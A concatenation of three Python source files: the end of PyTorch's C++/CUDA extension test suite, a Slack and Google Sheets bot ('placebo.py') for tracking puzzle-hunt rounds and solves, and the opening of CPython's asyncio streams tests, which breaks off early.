extra_cflags=["-g"],
verbose=True,
)
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.tanh_add(x, y)
self.assertEqual(z, x.tanh() + y.tanh())
# Checking we can call a method defined not in the main C++ file.
z = module.exp_add(x, y)
self.assertEqual(z, x.exp() + y.exp())
# Checking we can use this JIT-compiled class.
doubler = module.Doubler(2, 2)
self.assertIsNone(doubler.get().grad)
self.assertEqual(doubler.get().sum(), 4)
self.assertEqual(doubler.forward().sum(), 8)
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_jit_cuda_extension(self):
# NOTE: The name of the extension must equal the name of the module.
module = torch.utils.cpp_extension.load(
name="torch_test_cuda_extension",
sources=[
"cpp_extensions/cuda_extension.cpp",
"cpp_extensions/cuda_extension.cu",
],
extra_cuda_cflags=["-O2"],
verbose=True,
keep_intermediates=False,
)
x = torch.zeros(100, device="cuda", dtype=torch.float32)
y = torch.zeros(100, device="cuda", dtype=torch.float32)
z = module.sigmoid_add(x, y).cpu()
# 2 * sigmoid(0) = 2 * 0.5 = 1
self.assertEqual(z, torch.ones_like(z))
def _run_jit_cuda_archflags(self, flags, expected):
# Compile an extension with given `flags`
def _check_cuobjdump_output(expected_values, is_ptx=False):
elf_or_ptx = '--list-ptx' if is_ptx else '--list-elf'
lib_ext = '.pyd' if IS_WINDOWS else '.so'
# Note, .extension name may include _v1, _v2, so first find exact name
ext_filename = glob.glob(os.path.join(temp_dir,
'cudaext_archflag*' + lib_ext))[0]
command = ['cuobjdump', elf_or_ptx, ext_filename]
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, err = p.communicate()
output = output.decode("ascii")
err = err.decode("ascii")
if not p.returncode == 0 or not err == '':
raise AssertionError("Flags: {}\nReturncode: {}\nStderr: {}\n"
"Output: {} ".format(flags, p.returncode,
err, output))
actual_arches = sorted(re.findall(r'sm_\d\d', output))
expected_arches = sorted(['sm_' + xx for xx in expected_values])
self.assertEqual(actual_arches, expected_arches,
msg="Flags: {}, Actual: {}, Expected: {}\n"
"Stderr: {}\nOutput: {}".format(
flags, actual_arches, expected_arches,
err, output))
temp_dir = tempfile.mkdtemp()
old_envvar = os.environ.get('TORCH_CUDA_ARCH_LIST', None)
try:
os.environ['TORCH_CUDA_ARCH_LIST'] = flags
torch.utils.cpp_extension.load(
name="cudaext_archflags",
sources=[
"cpp_extensions/cuda_extension.cpp",
"cpp_extensions/cuda_extension.cu",
],
extra_cuda_cflags=["-O2"],
verbose=True,
build_directory=temp_dir,
)
# Expected output for --list-elf:
# ELF file 1: cudaext_archflags.1.sm_61.cubin
# ELF file 2: cudaext_archflags.2.sm_52.cubin
_check_cuobjdump_output(expected[0])
if expected[1] is not None:
# Expected output for --list-ptx:
# PTX file 1: cudaext_archflags.1.sm_61.ptx
_check_cuobjdump_output(expected[1], is_ptx=True)
finally:
if IS_WINDOWS:
print("Not wiping extensions build folder because Windows")
else:
shutil.rmtree(temp_dir)
if old_envvar is None:
os.environ.pop('TORCH_CUDA_ARCH_LIST')
else:
os.environ['TORCH_CUDA_ARCH_LIST'] = old_envvar
@unittest.skipIf(not TEST_CUDA, "CUDA not found")
@unittest.skipIf(TEST_ROCM, "disabled on rocm")
def test_jit_cuda_archflags(self):
# Test a number of combinations:
# - the default for the machine we're testing on
# - Separators, can be ';' (most common) or ' '
# - Architecture names
# - With/without '+PTX'
n = torch.cuda.device_count()
capabilities = {torch.cuda.get_device_capability(i) for i in range(n)}
# expected values is length-2 tuple: (list of ELF, list of PTX)
# note: there should not be more than one PTX value
archflags = {
'': (['{}{}'.format(capability[0], capability[1]) for capability in capabilities], None),
"Maxwell+Tegra;6.1": (['53', '61'], None),
"Pascal 3.5": (['35', '60', '61'], None),
"Volta": (['70'], ['70']),
}
if int(torch.version.cuda.split('.')[0]) >= 10:
# CUDA 9 only supports compute capability <= 7.2
archflags["7.5+PTX"] = (['75'], ['75'])
archflags["5.0;6.0+PTX;7.0;7.5"] = (['50', '60', '70', '75'], ['60'])
for flags, expected in archflags.items():
self._run_jit_cuda_archflags(flags, expected)
@unittest.skipIf(not TEST_CUDNN, "CuDNN not found")
def test_jit_cudnn_extension(self):
# implementation of CuDNN ReLU
if IS_WINDOWS:
extra_ldflags = ["cudnn.lib"]
else:
extra_ldflags = ["-lcudnn"]
module = torch.utils.cpp_extension.load(
name="torch_test_cudnn_extension",
sources=["cpp_extensions/cudnn_extension.cpp"],
extra_ldflags=extra_ldflags,
verbose=True,
with_cuda=True,
)
x = torch.randn(100, device="cuda", dtype=torch.float32)
y = torch.zeros(100, device="cuda", dtype=torch.float32)
module.cudnn_relu(x, y) # y=relu(x)
self.assertEqual(torch.nn.functional.relu(x), y)
with self.assertRaisesRegex(RuntimeError, "same size"):
y_incorrect = torch.zeros(20, device="cuda", dtype=torch.float32)
module.cudnn_relu(x, y_incorrect)
def test_inline_jit_compile_extension_with_functions_as_list(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_with_functions_list",
cpp_sources=cpp_source,
functions="tanh_add",
verbose=True,
)
self.assertEqual(module.tanh_add.__doc__.split("\n")[2], "tanh_add")
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.tanh_add(x, y)
self.assertEqual(z, x.tanh() + y.tanh())
def test_inline_jit_compile_extension_with_functions_as_dict(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_with_functions_dict",
cpp_sources=cpp_source,
functions={"tanh_add": "Tanh and then sum :D"},
verbose=True,
)
self.assertEqual(module.tanh_add.__doc__.split("\n")[2], "Tanh and then sum :D")
def test_inline_jit_compile_extension_multiple_sources_and_no_functions(self):
cpp_source1 = """
torch::Tensor sin_add(torch::Tensor x, torch::Tensor y) {
return x.sin() + y.sin();
}
"""
cpp_source2 = """
#include <torch/extension.h>
torch::Tensor sin_add(torch::Tensor x, torch::Tensor y);
PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) {
m.def("sin_add", &sin_add, "sin(x) + sin(y)");
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension",
cpp_sources=[cpp_source1, cpp_source2],
verbose=True,
)
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.sin_add(x, y)
self.assertEqual(z, x.sin() + y.sin())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_inline_jit_compile_extension_cuda(self):
cuda_source = """
__global__ void cos_add_kernel(
const float* __restrict__ x,
const float* __restrict__ y,
float* __restrict__ output,
const int size) {
const auto index = blockIdx.x * blockDim.x + threadIdx.x;
if (index < size) {
output[index] = __cosf(x[index]) + __cosf(y[index]);
}
}
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y) {
auto output = torch::zeros_like(x);
const int threads = 1024;
const int blocks = (output.numel() + threads - 1) / threads;
cos_add_kernel<<<blocks, threads>>>(x.data<float>(), y.data<float>(), output.data<float>(), output.numel());
return output;
}
"""
# Here, the C++ source need only declare the function signature.
cpp_source = "torch::Tensor cos_add(torch::Tensor x, torch::Tensor y);"
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_cuda",
cpp_sources=cpp_source,
cuda_sources=cuda_source,
functions=["cos_add"],
verbose=True,
)
self.assertEqual(module.cos_add.__doc__.split("\n")[2], "cos_add")
x = torch.randn(4, 4, device="cuda", dtype=torch.float32)
y = torch.randn(4, 4, device="cuda", dtype=torch.float32)
z = module.cos_add(x, y)
self.assertEqual(z, x.cos() + y.cos())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_inline_jit_compile_custom_op_cuda(self):
cuda_source = """
__global__ void cos_add_kernel(
const float* __restrict__ x,
const float* __restrict__ y,
float* __restrict__ output,
const int size) {
const auto index = blockIdx.x * blockDim.x + threadIdx.x;
if (index < size) {
output[index] = __cosf(x[index]) + __cosf(y[index]);
}
}
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y) {
auto output = torch::zeros_like(x);
const int threads = 1024;
const int blocks = (output.numel() + threads - 1) / threads;
cos_add_kernel<<<blocks, threads>>>(x.data_ptr<float>(), y.data_ptr<float>(), output.data_ptr<float>(), output.numel());
return output;
}
"""
# Here, the C++ source need only declare the function signature.
cpp_source = """
#include <torch/library.h>
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y);
TORCH_LIBRARY(inline_jit_extension_custom_op_cuda, m) {
m.def("cos_add", cos_add);
}
"""
torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_custom_op_cuda",
cpp_sources=cpp_source,
cuda_sources=cuda_source,
verbose=True,
is_python_module=False,
)
x = torch.randn(4, 4, device="cuda", dtype=torch.float32)
y = torch.randn(4, 4, device="cuda", dtype=torch.float32)
z = torch.ops.inline_jit_extension_custom_op_cuda.cos_add(x, y)
self.assertEqual(z, x.cos() + y.cos())
def test_inline_jit_compile_extension_throws_when_functions_is_bad(self):
with self.assertRaises(ValueError):
torch.utils.cpp_extension.load_inline(
name="invalid_jit_extension", cpp_sources="", functions=5
)
def test_lenient_flag_handling_in_jit_extensions(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="lenient_flag_handling_extension",
cpp_sources=cpp_source,
functions="tanh_add",
extra_cflags=["-g\n\n", "-O0 -Wall"],
extra_include_paths=[" cpp_extensions\n"],
verbose=True,
)
x = torch.zeros(100, dtype=torch.float32)
y = torch.zeros(100, dtype=torch.float32)
z = module.tanh_add(x, y).cpu()
self.assertEqual(z, x.tanh() + y.tanh())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_half_support(self):
"""
Checks for an issue with operator< ambiguity for half when certain
THC headers are included.
See https://github.com/pytorch/pytorch/pull/10301#issuecomment-416773333
for the corresponding issue.
"""
cuda_source = """
#include <THC/THCNumerics.cuh>
template<typename T, typename U>
__global__ void half_test_kernel(const T* input, U* output) {
if (input[0] < input[1] || input[0] >= input[1]) {
output[0] = 123;
}
}
torch::Tensor half_test(torch::Tensor input) {
auto output = torch::empty(1, input.options().dtype(torch::kFloat));
AT_DISPATCH_FLOATING_TYPES_AND_HALF(input.scalar_type(), "half_test", [&] {
half_test_kernel<scalar_t><<<1, 1>>>(
input.data<scalar_t>(),
output.data<float>());
});
return output;
}
"""
module = torch.utils.cpp_extension.load_inline(
name="half_test_extension",
cpp_sources="torch::Tensor half_test(torch::Tensor input);",
cuda_sources=cuda_source,
functions=["half_test"],
verbose=True,
)
x = torch.randn(3, device="cuda", dtype=torch.half)
result = module.half_test(x)
self.assertEqual(result[0], 123)
def test_reload_jit_extension(self):
def compile(code):
return torch.utils.cpp_extension.load_inline(
name="reloaded_jit_extension",
cpp_sources=code,
functions="f",
verbose=True,
)
module = compile("int f() { return 123; }")
self.assertEqual(module.f(), 123)
module = compile("int f() { return 456; }")
self.assertEqual(module.f(), 456)
module = compile("int f() { return 456; }")
self.assertEqual(module.f(), 456)
module = compile("int f() { return 789; }")
self.assertEqual(module.f(), 789)
def test_cpp_frontend_module_has_same_output_as_python(self, dtype=torch.double):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
input = torch.randn(2, 5, dtype=dtype)
cpp_linear = extension.Net(5, 2)
cpp_linear.to(dtype)
python_linear = torch.nn.Linear(5, 2).to(dtype)
# First make sure they have the same parameters
cpp_parameters = dict(cpp_linear.named_parameters())
with torch.no_grad():
python_linear.weight.copy_(cpp_parameters["fc.weight"])
python_linear.bias.copy_(cpp_parameters["fc.bias"])
cpp_output = cpp_linear.forward(input)
python_output = python_linear(input)
self.assertEqual(cpp_output, python_output)
cpp_output.sum().backward()
python_output.sum().backward()
for p in cpp_linear.parameters():
self.assertFalse(p.grad is None)
self.assertEqual(cpp_parameters["fc.weight"].grad, python_linear.weight.grad)
self.assertEqual(cpp_parameters["fc.bias"].grad, python_linear.bias.grad)
def test_cpp_frontend_module_python_inter_op(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
# Create a torch.nn.Module which uses the C++ module as a submodule.
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.x = torch.nn.Parameter(torch.tensor(1.0))
self.net = extension.Net(3, 5)
def forward(self, input):
return self.net.forward(input) + self.x
net = extension.Net(5, 2)
net.double()
net.to(torch.get_default_dtype())
self.assertEqual(str(net), "Net")
# Further embed the torch.nn.Module into a Sequential, and also add the
# C++ module as an element of the Sequential.
sequential = torch.nn.Sequential(M(), torch.nn.Tanh(), net, torch.nn.Sigmoid())
input = torch.randn(2, 3)
# Try calling the module!
output = sequential.forward(input)
# The call operator is bound to forward too.
self.assertEqual(output, sequential(input))
self.assertEqual(list(output.shape), [2, 2])
# Do changes on the module hierarchy.
old_dtype = torch.get_default_dtype()
sequential.to(torch.float64)
sequential.to(torch.float32)
sequential.to(old_dtype)
self.assertEqual(sequential[2].parameters()[0].dtype, old_dtype)
# Make sure we can access these methods recursively.
self.assertEqual(len(list(sequential.parameters())), len(net.parameters()) * 2 + 1)
self.assertEqual(len(list(sequential.named_parameters())), len(net.named_parameters()) * 2 + 1)
self.assertEqual(len(list(sequential.buffers())), len(net.buffers()) * 2)
self.assertEqual(len(list(sequential.modules())), 8)
# Test clone()
net2 = net.clone()
self.assertEqual(len(net.parameters()), len(net2.parameters()))
self.assertEqual(len(net.buffers()), len(net2.buffers()))
self.assertEqual(len(net.modules()), len(net2.modules()))
# Try differentiating through the whole module.
for parameter in net.parameters():
self.assertIsNone(parameter.grad)
output.sum().backward()
for parameter in net.parameters():
self.assertFalse(parameter.grad is None)
self.assertGreater(parameter.grad.sum(), 0)
# Try calling zero_grad()
net.zero_grad()
for p in net.parameters():
self.assertEqual(p.grad, torch.zeros_like(p))
# Test train(), eval(), training (a property)
self.assertTrue(net.training)
net.eval()
self.assertFalse(net.training)
net.train()
self.assertTrue(net.training)
net.eval()
# Try calling the additional methods we registered.
biased_input = torch.randn(4, 5)
output_before = net.forward(biased_input)
bias = net.get_bias().clone()
self.assertEqual(list(bias.shape), [2])
net.set_bias(bias + 1)
self.assertEqual(net.get_bias(), bias + 1)
output_after = net.forward(biased_input)
self.assertNotEqual(output_before, output_after)
# Try accessing parameters
self.assertEqual(len(net.parameters()), 2)
np = net.named_parameters()
self.assertEqual(len(np), 2)
self.assertIn("fc.weight", np)
self.assertIn("fc.bias", np)
self.assertEqual(len(net.buffers()), 1)
nb = net.named_buffers()
self.assertEqual(len(nb), 1)
self.assertIn("buf", nb)
self.assertEqual(nb[0][1], torch.eye(5))
def test_cpp_frontend_module_has_up_to_date_attributes(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
net = extension.Net(5, 2)
self.assertEqual(len(net._parameters), 0)
net.add_new_parameter("foo", torch.eye(5))
self.assertEqual(len(net._parameters), 1)
self.assertEqual(len(net._buffers), 1)
net.add_new_buffer("bar", torch.eye(5))
self.assertEqual(len(net._buffers), 2)
self.assertEqual(len(net._modules), 1)
net.add_new_submodule("fc2")
self.assertEqual(len(net._modules), 2)
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_cpp_frontend_module_python_inter_op_with_cuda(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
net = extension.Net(5, 2)
for p in net.parameters():
self.assertTrue(p.device.type == "cpu")
cpu_parameters = [p.clone() for p in net.parameters()]
device = torch.device("cuda", 0)
net.to(device)
for i, p in enumerate(net.parameters()):
self.assertTrue(p.device.type == "cuda")
self.assertTrue(p.device.index == 0)
self.assertEqual(cpu_parameters[i], p)
net.cpu()
net.add_new_parameter("a", torch.eye(5))
net.add_new_parameter("b", torch.eye(5))
net.add_new_buffer("c", torch.eye(5))
net.add_new_buffer("d", torch.eye(5))
net.add_new_submodule("fc2")
net.add_new_submodule("fc3")
for p in net.parameters():
self.assertTrue(p.device.type == "cpu")
net.cuda()
for p in net.parameters():
self.assertTrue(p.device.type == "cuda")
def test_returns_shared_library_path_when_is_python_module_is_true(self):
source = """
#include <torch/script.h>
torch::Tensor func(torch::Tensor x) { return x; }
static torch::RegisterOperators r("test::func", &func);
"""
torch.utils.cpp_extension.load_inline(
name="is_python_module",
cpp_sources=source,
functions="func",
verbose=True,
is_python_module=False,
)
self.assertEqual(torch.ops.test.func(torch.eye(5)), torch.eye(5))
def test_set_default_type_also_changes_aten_default_type(self):
module = torch.utils.cpp_extension.load_inline(
name="test_set_default_type",
cpp_sources="torch::Tensor get() { return torch::empty({}); }",
functions="get",
verbose=True,
)
initial_default = torch.get_default_dtype()
try:
self.assertEqual(module.get().dtype, initial_default)
torch.set_default_dtype(torch.float64)
self.assertEqual(module.get().dtype, torch.float64)
torch.set_default_dtype(torch.float32)
self.assertEqual(module.get().dtype, torch.float32)
torch.set_default_dtype(torch.float16)
self.assertEqual(module.get().dtype, torch.float16)
finally:
torch.set_default_dtype(initial_default)
def test_compilation_error_formatting(self):
# Test that the missing-semicolon error message has linebreaks in it.
# This'll fail if the message has been munged into a single line.
# It's hard to write anything more specific as every compiler has it's own
# error formatting.
with self.assertRaises(RuntimeError) as e:
torch.utils.cpp_extension.load_inline(
name="test_compilation_error_formatting",
cpp_sources="int main() { return 0 }")
pattern = r'.*(\\n|\\r).*'
self.assertNotRegex(str(e), pattern)
def test_warning(self):
# Note: the module created from this source will include the py::key_error
# symbol. But because of visibility and the fact that it lives in a
# different compilation unit than pybind, this trips up ubsan even though
# it is fine. "ubsan.supp" thus needs to contain "vptr:warn_mod.so".
source = '''
// error_type:
// 0: no error
// 1: torch::TypeError
// 2: python_error()
// 3: py::error_already_set
at::Tensor foo(at::Tensor x, int error_type) {
std::ostringstream err_stream;
err_stream << "Error with " << x.type();
TORCH_WARN(err_stream.str());
if(error_type == 1) {
throw torch::TypeError(err_stream.str().c_str());
}
if(error_type == 2) {
PyObject* obj = PyTuple_New(-1);
TORCH_CHECK(!obj);
// Pretend it was caught in a different thread and restored here
auto e = python_error();
e.persist();
e.restore();
throw e;
}
if(error_type == 3) {
throw py::key_error(err_stream.str());
}
return x.cos();
}
'''
# Ensure double type for hard-coded c name below
t = torch.rand(2).double()
cpp_tensor_name = r"CPUDoubleType"
# Without error handling, the warnings cannot be catched
warn_mod = torch.utils.cpp_extension.load_inline(name='warn_mod',
cpp_sources=[source],
functions=['foo'],
with_pytorch_error_handling=False)
with warnings.catch_warnings(record=True) as w:
warn_mod.foo(t, 0)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(SystemError, "bad argument to internal function"):
warn_mod.foo(t, 2)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(KeyError, cpp_tensor_name):
warn_mod.foo(t, 3)
self.assertEqual(len(w), 0)
warn_mod = torch.utils.cpp_extension.load_inline(name='warn_mod',
cpp_sources=[source],
functions=['foo'],
with_pytorch_error_handling=True)
with warnings.catch_warnings(record=True) as w:
# Catched with no error should be detected
warn_mod.foo(t, 0)
self.assertEqual(len(w), 1)
# Catched with cpp error should also be detected
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 2)
# Catched with python error should also be detected
with self.assertRaisesRegex(SystemError, "bad argument to internal function"):
warn_mod.foo(t, 2)
self.assertEqual(len(w), 3)
# Catched with pybind error should also be detected
# Note that there is no type name translation for pybind errors
with self.assertRaisesRegex(KeyError, cpp_tensor_name):
warn_mod.foo(t, 3)
self.assertEqual(len(w), 4)
# Make sure raising warnings are handled properly
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("error")
# No error, the warning should raise
with self.assertRaisesRegex(UserWarning, t.type()):
warn_mod.foo(t, 0)
self.assertEqual(len(w), 0)
# Another error happened, the warning is ignored
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 0)
def test_autograd_from_cpp(self):
source = '''
void run_back(at::Tensor x) {
x.backward({});
}
void run_back_no_gil(at::Tensor x) {
pybind11::gil_scoped_release no_gil;
x.backward({});
}
'''
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, gx):
return gx
test_backward_deadlock = torch.utils.cpp_extension.load_inline(name='test_backward_deadlock',
cpp_sources=[source],
functions=['run_back', 'run_back_no_gil'],)
# This used to deadlock
inp = torch.rand(20, requires_grad=True)
loss = MyFn.apply(inp).sum()
with self.assertRaisesRegex(RuntimeError, "The autograd engine was called while holding the GIL."):
test_backward_deadlock.run_back(loss)
inp = torch.rand(20, requires_grad=True)
loss = MyFn.apply(inp).sum()
test_backward_deadlock.run_back_no_gil(loss)
def test_custom_compound_op_autograd(self):
# Test that a custom compound op (i.e. a custom op that just calls other aten ops)
# correctly returns gradients of those other ops
source = """
#include <torch/library.h>
torch::Tensor my_add(torch::Tensor x, torch::Tensor y) {
return x + y;
}
TORCH_LIBRARY(my, m) {
m.def("add", &my_add);
}
"""
torch.utils.cpp_extension.load_inline(
name="is_python_module",
cpp_sources=source,
verbose=True,
is_python_module=False,
)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
gradcheck(torch.ops.my.add, [a, b], eps=1e-2)
@unittest.skipIf(not has_breakpad(), "Breakpad library must be present on system for crash handler")
@unittest.skipIf(TEST_WITH_ASAN, "ASAN disables the crash handler's signal handler")
def test_crash_handler(self):
def run_test(stderr_file, destination):
# Code to enable dumps and trigger a segfault
csrc = textwrap.dedent(f"""
#include <torch/torch.h>
int fail() {{
torch::crash_handler::enable_minidumps("{destination}");
volatile int* bad = nullptr;
return *bad;
}}
""")
# Some special stuff to overwrite stderr for a C++ extension
# Copied from: https://stackoverflow.com/questions/8804893/redirect-stdout-from-python-for-c-calls
sys.stdout.flush()
newstdout = os.dup(2)
devnull = os.open(stderr_file, os.O_WRONLY)
os.dup2(devnull, 2)
os.close(devnull)
sys.stdout = os.fdopen(newstdout, 'w')
module = torch.utils.cpp_extension.load_inline(
name="segfault",
cpp_sources=csrc,
functions=["fail"],
)
module.fail()
with tempfile.TemporaryDirectory() as temp_dir, tempfile.NamedTemporaryFile() as stderr:
# Use multiprocessing to spin up a separate process to make catching
# the segfault easier
p = Process(target=run_test, args=(stderr.name, temp_dir))
p.start()
p.join()
with open(stderr.name) as f:
result = f.read().strip()
# Check that the signal handler was called
self.assertTrue(result.startswith(f"Wrote minidump to {temp_dir}"))
with open(result.replace("Wrote minidump to ", ""), "rb") as dump_file:
dump_bytes = dump_file.read()
# Check that the file has the correct magic number
self.assertEqual(b"MDMP", dump_bytes[0:4])
if __name__ == "__main__":
common.run_tests()
|
placebo.py
|
import logging
import os
import queue
import threading
from typing import Callable, Optional
import requests
import google_client
import slack_client
import util
logging.basicConfig(format='{asctime} {name} {levelname}: {message}', style='{')
logging.getLogger('googleapiclient').setLevel(logging.ERROR) # It's real noisy.
log = logging.getLogger('placebo')
log.setLevel(logging.DEBUG if os.getenv('PLACEBO_DEBUG_LOGS') == '1' else logging.INFO)
class Placebo:
def __init__(self) -> None:
self.create_metas = os.getenv('PLACEBO_CREATE_METAS', '1') == '1'
self.metas_have_names = (self.create_metas and
os.environ.get('PLACEBO_METAS_HAVE_NAMES') == '1')
self.google = google_client.Google()
self.slack = slack_client.Slack()
log.addHandler(slack_client.SlackLogHandler(self.slack, level=logging.ERROR))
self.queue: queue.Queue[Callable[[], None]] = queue.Queue()
# If set, it's the round in which the most recent puzzle was unlocked. It's used as the
# default round for the unlock dialog, to make repeated unlocks easier.
self.last_round: Optional[str] = None
threading.Thread(target=self._worker_thread, daemon=True).start()
auth_url = self.google.start_oauth_if_necessary()
if auth_url:
self.slack.dm_admin(f'While logged in as the bot user, please visit {auth_url}')
# The public methods don't do any work -- they just enqueue a call to the corresponding private
# method, which the worker thread picks up. That accomplishes two things:
# - Ensures we always return a 200 for the incoming HTTP request promptly, without waiting for
# our API backends.
# - Ensures we're never handling more than one request at a time.
def new_round(self, round_name: str, round_url: str, round_color: Optional[util.Color],
meta_name: Optional[str] = None) -> None:
self.queue.put(lambda: self._new_round(round_name, round_url, round_color, meta_name))
def new_puzzle(self, round_name: str, puzzle_name: str, puzzle_url: str,
response_url: Optional[str] = None) -> None:
self.queue.put(lambda: self._new_puzzle(round_name, puzzle_name, puzzle_url, response_url,
meta=False, round_color=None))
def solved_puzzle(
self, puzzle_name: str, answer: str, response_url: Optional[str] = None) -> None:
self.queue.put(lambda: self._solved_puzzle(puzzle_name, answer, response_url))
def view_closed(self, view_id: str) -> None:
self.queue.put(lambda: self._view_closed(view_id))
def _worker_thread(self) -> None:
while True:
func = self.queue.get()
try:
func()
except BaseException:
# TODO: Reply to the original command if we can.
log.exception('Error in worker thread.')
def _new_round(self, round_name: str, round_url: str, round_color: Optional[util.Color],
meta_name: Optional[str]) -> None:
if self.create_metas:
if not meta_name:
meta_name = f'{round_name} Meta'
self._new_puzzle(round_name, meta_name, round_url, response_url=None, meta=True,
round_color=round_color)
else:
self.last_round = round_name
round_color = self.google.add_empty_row(round_name, round_color)
self.slack.announce_round(round_name, round_url, round_color)
def _new_puzzle(self, round_name: str, puzzle_name: str, puzzle_url: str,
response_url: Optional[str], meta: bool,
round_color: Optional[util.Color]) -> None:
_ephemeral_ack(f'Adding *{puzzle_name}*...', response_url)
if meta and self.metas_have_names:
full_puzzle_name = f'{puzzle_name} ({round_name} Meta)'
else:
full_puzzle_name = puzzle_name
if self.google.exists(full_puzzle_name):
raise KeyError(f'Puzzle "{full_puzzle_name}" is already in the tracker.')
# Creating the spreadsheet is super slow, so do it in parallel.
doc_url_future = util.future(self.google.create_puzzle_spreadsheet, [full_puzzle_name])
# Meanwhile, set up everything else...
self.last_round = round_name
if meta and self.metas_have_names:
alias = puzzle_name
channel_name, channel_id = self.slack.create_channel(puzzle_url, prefix='meta',
alias=alias)
elif meta:
channel_name, channel_id = self.slack.create_channel(puzzle_url, prefix='meta')
else:
channel_name, channel_id = self.slack.create_channel(puzzle_url)
priority = 'L' if meta else 'M'
round_color = self.google.add_row(round_name, full_puzzle_name, priority, puzzle_url,
channel_name, round_color)
if meta:
self.slack.announce_round(round_name, puzzle_url, round_color)
else:
self.slack.announce_unlock(round_name, full_puzzle_name, puzzle_url, channel_name,
channel_id, round_color)
# ... then wait for the doc URL, and go back and fill it in. But don't hold up the worker
# thread in the meantime.
def await_and_finish():
doc_url = doc_url_future.wait()
self.queue.put(
lambda: self._finish_new_puzzle(full_puzzle_name, puzzle_url, channel_id, doc_url))
threading.Thread(target=await_and_finish).start()
def _finish_new_puzzle(
self, full_puzzle_name: str, puzzle_url: str, channel_id: str, doc_url: str) -> None:
try:
self.google.set_doc_url(full_puzzle_name, doc_url)
except KeyError:
log.exception('Tracker row went missing before we got to it -- puzzle name changed?')
except google_client.UrlConflictError as e:
log.exception('Doc URL was set before we got to it')
doc_url = e.found_url
self.slack.set_topic(channel_id, puzzle_url, doc_url)
def _solved_puzzle(self, puzzle_name: str, answer: str, response_url: Optional[str]) -> None:
# It'll already be in caps if it was typed as a command arg, but it might not if it came
# from the modal.
answer = answer.upper()
_ephemeral_ack(f'Marking *{puzzle_name}* correct...', response_url)
lookup = self.google.lookup(puzzle_name)
if lookup is None:
raise KeyError(f'Puzzle "{puzzle_name}" not found.')
row_index, doc_url, channel_name = lookup
if doc_url:
self.google.mark_doc_solved(doc_url)
self.google.mark_row_solved(row_index, answer)
if channel_name:
self.slack.solved(channel_name, answer)
self.slack.announce_solved(puzzle_name, answer)
def _view_closed(self, view_id: str) -> None:
self.slack.delete_in_progress_message(view_id)
def _ephemeral_ack(message, response_url) -> None:
if not response_url:
return
log.info('Logging ephemeral acknowledgment...')
response = requests.post(response_url, json={
'text': message,
'response_type': 'ephemeral'
})
if response.status_code != 200:
log.error(f"Couldn't log ephemeral acknowledgment: {response.status_code} {response.text}")
|
test_streams.py
|
"""Tests for streams.py."""
import gc
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test import support
try:
import ssl
except ImportError:
ssl = None
import asyncio
from test.test_asyncio import utils as test_utils
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.StreamReader()
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
